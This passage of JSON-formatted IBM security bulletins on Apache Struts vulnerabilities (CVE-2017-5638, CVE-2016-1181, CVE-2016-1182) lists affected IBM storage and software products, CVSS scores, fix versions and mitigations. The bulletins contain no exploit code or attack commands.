arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM Storwize V7000 Unified \nThe product is affected when running code releases 1.5.x and 1.6.0.0 to 1.6.2.1\n\n## Remediation/Fixes\n\nA fix for these issues is in version 1.6.2.2 of IBM Storwize V7000 Unified. Version 1.5 is end of service. Customers running on this release of IBM Storwize V7000 Unified can upgrade to v1.6.2.2 for a fix. \n \n[_Latest Storwize V7000 Unified Software_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003918&myns=s028&mynp=OCST5Q4U&mync=E>) \n \nPlease contact IBM support for assistance in upgrading your system.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:34:31", "type": "ibm", "title": "Security Bulletin:Vulnerability in Apache Struts affects Storwize V7000 Unified (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:34:31", "id": "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "href": "https://www.ibm.com/support/pages/node/697609", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:34", "description": "## Summary\n\nIBM OpenPages GRC Platform Web Applications are not vulnerable to the Apache Struts 2 vulnerability CVE-2017-5638 \n\n## Vulnerability Details\n\nIBM OpenPages GRC Platform Web Applications are NOT vulnerable to the Apache Struts 2 vulnerability (CVE-2017-5638). \nPlease refer to [_https://cwiki.apache.org/confluence/display/WW/S2-045_](<https://cwiki.apache.org/confluence/display/WW/S2-045>) for more information on CVE-2017-5638.\n\n## Affected Products and Versions\n\nIBM OpenPages versions 7.0 through 7.3\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:49:16", "type": "ibm", "title": "Security Bulletin: IBM OpenPages GRC Platform Web Applications are not vulnerable to (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:49:16", "id": "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5", "href": "https://www.ibm.com/support/pages/node/294331", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T17:39:35", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of SAN Volume Controller, Storwize family and FlashSystem V9000 products allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \n \nAll products are affected when running supported releases 7.1 to 7.8. For unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of the product.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500 to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest SAN Volume Controller Code_](<http://www-01.ibm.com/support/docview.wss?rs=591&uid=ssg1S1001707>) \n[_Latest Storwize V7000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003705>) \n[_Latest Storwize V5000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004336>) \n[_Latest Storwize V3700 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004172>) \n[_Latest Storwize V3500 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004171>) \n \nFor IBM FlashSystem V9000, upgrade to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects SAN Volume Controller, Storwize family and FlashSystem V9000 products (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-03-29T01:48:02", "id": "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "href": "https://www.ibm.com/support/pages/node/697171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-27T21:55:41", "description": "## Summary\n\nA vulnerability in Apache Struts used by IBM InfoSphere Information Server was addressed.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2016-1181](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113852](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nInfoSphere Information Server, Information Server on Cloud | 11.7 \nInfoSphere Information Server, Information Server on Cloud | 11.5 \nInfoSphere Information Server | 11.3 \n \n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_ | _APAR_ | _Remediation/First Fix_ \n---|---|---|--- \nInfoSphere Information Server, Information Server on Cloud | 11.7 | [JR61276](<http://www.ibm.com/support/docview.wss?uid=swg1JR61276> \"JR61276\" ) | \\--Apply IBM InfoSphere Information Server version [11.7.1.0](<https://www.ibm.com/support/pages/node/878310>) \n\\--Apply IBM InfoSphere Information Server version [11.7.1.1](<https://www.ibm.com/support/pages/node/6209196> \"11.7.1.1\" ) \n \nInfoSphere Information Server, Information Server on Cloud | 11.5 | [JR61276](<http://www.ibm.com/support/docview.wss?uid=swg1JR61276> \"JR61276\" ) | \\--Contact IBM Customer Support \nInfoSphere Information Server | 11.3 | [JR61276](<http://www.ibm.com/support/docview.wss?uid=swg1JR61276> \"JR61276\" ) | \\--Upgrade to a new release where the issue is addressed \n \n**Contact Technical Support:**\n\nIn the United States and Canada dial **1-800-IBM-SERV** \nView the support [contacts for other countries](<http://www.ibm.com/planetwide/>) outside of the United States. \nElectronically [open a Service Request](<http://www.ibm.com/software/support/probsub.html>) with Information Server Technical Support.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T20:17:06", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects IBM InfoSphere Information Server", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181"], "modified": "2020-05-18T20:17:06", "id": "50F17354A0A89B52C1E061D02F78509C6F34AF2860DC46D6DFC82469E2AB6C29", "href": "https://www.ibm.com/support/pages/node/6209476", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:45:02", "description": "## Summary\n\nStruts v2 vulnerabilities affect IBM Security Guardium. IBM Security Guardium has addressed the following vulnerability. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-1181](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/113852> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2016-1182](<https://vulners.com/cve/CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/113853> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected IBM Security Guardium **\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM Security Guardium | 10.0 - 10.5 \n \n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / First Fix** \n \n---|---|--- \nIBM Security Guardium | 10.0 - 10.5 | \n\nhttp://www.ibm.com/support/fixcentral/swg/quickorder?parent=IBM%20Security&amp;product=ibm/Information+Management/InfoSphere+Guardium&amp;release=10.0&amp;platform=All&amp;function=fixId&amp;fixids=SqlGuard_10.0p600_GPU_Nov-2018-V10.6&amp;includeSupersedes=0&amp;source=fc \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-12-13T20:35:01", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Struts v2 affect IBM Security Guardium (CVE-2016-1181, CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-12-13T20:35:01", "id": "F5BAF336C0FFA1A9715652B899383A9C6D730D8ADE9E07CAD68C90971C7F8249", "href": "https://www.ibm.com/support/pages/node/741659", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:51:13", "description": "## Summary\n\nStruts v2 vulnerabilities affect IBM Security Identity Manager. IBM Security Identity Manager has addressed the applicable CVEs. \n \nThese issues were also addressed by IBM WebSphere Application Server, which is shipped with IBM Security Identity Manager. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n \nIBM Security Identity Manager version 6.0 \n\n\n## Remediation/Fixes\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Security Identity Manager version 6.0| Apply fixes from Identity Manager and WebSphere Application Server \n \nIBM Security Identity Manager (ISIM) [6.0.0-ISS-SIM-FP0015](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FTivoli%2FTivoli+Identity+Manager&fixids=6.0.0-ISS-SIM-FP0015&source=SAR&function=fixId&parent=IBM%20Security>) \n \n \nIBM Websphere Application Server 7.0, 8.0, 8.5 and 8.5.5 - [Vulnerabilities in Apache Struts affects IBM WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-16T21:47:37", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Struts v2 affect IBM Security Identity Manager ( CVE-2016-1181 CVE-2016-1182 )", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-16T21:47:37", "id": "C24D4FCC97FD95E90382A4216040099F16203ABF61AF30281EF1C2E136253A42", "href": "https://www.ibm.com/support/pages/node/555339", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:52:19", "description": "## Summary\n\nMultiple vulnerabilities have been identified in Struts that is embedded in the IBM FSM. This bulletin addresses these vulnerabilities.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nFlex System Manager 1.3.4.0 \nFlex System Manager 1.3.3.0 \nFlex System Manager 1.3.2.1 \nFlex System Manager 1.3.2.0\n\n## Remediation/Fixes\n\nIBM recommends updating the FSM using the instructions referenced in this table. \n \n**WARNING:** If an early version (fix downloaded before 4/19/2017) of the fix listed below was installed, the brand information on the FSM login screen will be displayed as \"IBM Systems Director\". This branding issue will not cause any functional FSM issues. The correct FSM branding can be restored by downloading the current version of the fix (Release Date of the fix listed in table is 4/26/2017 or later), reinstalling the current version of the fix and restarting the FSM. \n \n\n\nProduct | \n\nVRMF | \n\nRemediation \n---|---|--- \n \nFlex System Manager | \n\n1.3.4.0 | Install [fsmfix1.3.4.0_IT19321_IT19679_IT19695_IT19698_IT19709_IT19811](<https://www.ibm.com/support/fixcentral/systemx/selectFixes?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.4.0_IT19321_IT19679_IT19695_IT19698_IT19709_IT19811&function=fixId&parent=Flex%20System%20Manager%20NodeFlex%20System%20Manager>) \n \nFlex System Manager | \n\n1.3.3.0 | Install [fsmfix1.3.3.0_IT19321_IT19679_IT19695_IT19698_IT19709_IT19811](<https://www.ibm.com/support/fixcentral/systemx/selectFixes?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.3.0_IT19321_IT19679_IT19695_IT19698_IT19709_IT19811&function=fixId&parent=Flex%20System%20Manager%20NodeFlex%20System%20Manager>) \n \nFlex System Manager | \n\n1.3.2.1 \n1.3.2.0 | Install [fsmfix1.3.2.0_IT19321_IT19679_IT19695_IT19698_IT19709_IT19811](<https://www.ibm.com/support/fixcentral/systemx/selectFixes?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.2.0_IT19321_IT19679_IT19695_IT19698_IT19709_IT19811&function=fixId&parent=Flex%20System%20Manager%20NodeFlex%20System%20Manager>) \n \nFor all VRMF not listed in this table, IBM recommends upgrading to a fixed and supported version/release of the product. \n \nFor a complete list of FSM security bulletins refer to this technote: [http://www-01.ibm.com/support/docview.wss?uid=nas7797054ebc3d9857486258027006ce4a0&amp;myns=purflex&amp;mync=E&amp;cm_sp=purflex-_-NULL-_-E](<http://www-01.ibm.com/support/docview.wss?uid=nas7797054ebc3d9857486258027006ce4a0&myns=purflex&mync=E&cm_sp=purflex-_-NULL-_-E>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-18T01:35:37", "type": "ibm", "title": "Security Bulletin: IBM Flex System Manager (FSM) is affected by multiple Struts vulnerabilities (CVE-2016-1181, CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-18T01:35:37", "id": "3C630E87CC8A98E980FC5838CF94096C676B99FA65014F79A0F1057053EEB9E0", "href": "https://www.ibm.com/support/pages/node/630955", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:41:39", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Rational ClearCase. Information about a security vulnerability affecting WAS has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nIBM Rational ClearCase, ClearCase Remote Client (CCRC) WAN server/CM Server component. \n\n**Versions 8.0.0.x, 8.0.1.x, 9.0.0.x:**\n\n \nThis vulnerability affects only the CCRC WAN server component. \n**Versions 7.1.x.x:**\n\n \nNot affected.\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS), which is shipped with IBM Rational ClearCase. \n \n\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearCase, versions 8.0.0.x, 8.0.1.x, 9.0.0.x| IBM WebSphere Application Server versions 8.5.5 Full Profile, 8.5 Full Profile, 8.0, 7.0| [Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www.ibm.com/support/docview.wss?uid=swg21985995>) \n \n**ClearCase Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n8.0.0.x \n8.0.1.x \n9.0.0.x| Apply the appropriate WebSphere Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-07-10T08:34:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server that is shipped with IBM Rational ClearCase (CVE-2016-1181, CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-07-10T08:34:12", "id": "2DD38E427DB50FDA5C4D07F52BDC62BA35206BA44BC185595E39ACAE88DD41C5", "href": "https://www.ibm.com/support/pages/node/284237", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:54:01", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Enterprise Service Bus. Information about the security vulnerabilities affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Vulnerabilities in Apache Struts affects IBM WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nWebSphere Enterprise Service Bus v7.0 and v 7.5 \nWebSphere Enterprise Service Bus Registry Edition v7.0 and v 7.5\n\n## ", "cvss3": {}, "published": "2018-06-15T07:05:57", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere \nApplication Server shipped with WebSphere Enterprise Service Bus (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-15T07:05:57", "id": "4C800D760232A012AE25AED7F8AFCFF9E3EF3D9D48D3614E764CC6588F221519", "href": "https://www.ibm.com/support/pages/node/284105", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T01:51:23", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Partner Gateway. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## 